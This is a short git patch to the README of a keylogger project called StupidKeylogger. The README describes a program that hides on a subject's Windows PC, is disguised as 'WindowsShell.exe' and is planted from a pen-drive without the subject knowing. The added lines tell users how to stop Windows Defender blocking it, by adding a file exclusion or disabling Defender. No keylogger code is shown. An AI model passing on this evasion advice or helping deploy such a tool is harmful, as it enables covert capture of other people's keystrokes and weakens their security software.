From dbe5bb9408e65f3f38450a71ffd7a6d39a95f3e3 Mon Sep 17 00:00:00 2001 From: hack3r-0m <54898623+hack3r-0m@users.noreply.github.com> Date: Thu, 1 Oct 2020 11:50:42 -0700 Subject: [PATCH] Update README.md Added documentation for helping with windows defender blocking. --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 3405785..ed2ab2e 100644 --- a/README.md +++ b/README.md @@ -13,6 +13,8 @@ This tacky program hides itself in the subject’s PC (Windows XP or later), and
StupidKeylogger
+ + (NOTE : Windows Defender may detect this program as potential security threat at runtime, you can either [allow specific files](https://support.microsoft.com/en-us/help/4028485/windows-10-add-an-exclusion-to-windows-security) or disable windows defender(NOT RECOMMENDED) ) **WindowsShell.exe** is the compiled and renamed form of [**Keylogger.cpp**](https://github.com/MinhasKamal/StupidKeylogger/blob/master/com/minhaskamal/stupidKeylogger/Keylogger.cpp). Of course you do not expect others to let you insert a pen-drive containing keylogger; even if that is stupid! **WindowsShell** is the link file of **WindowsShell.exe**.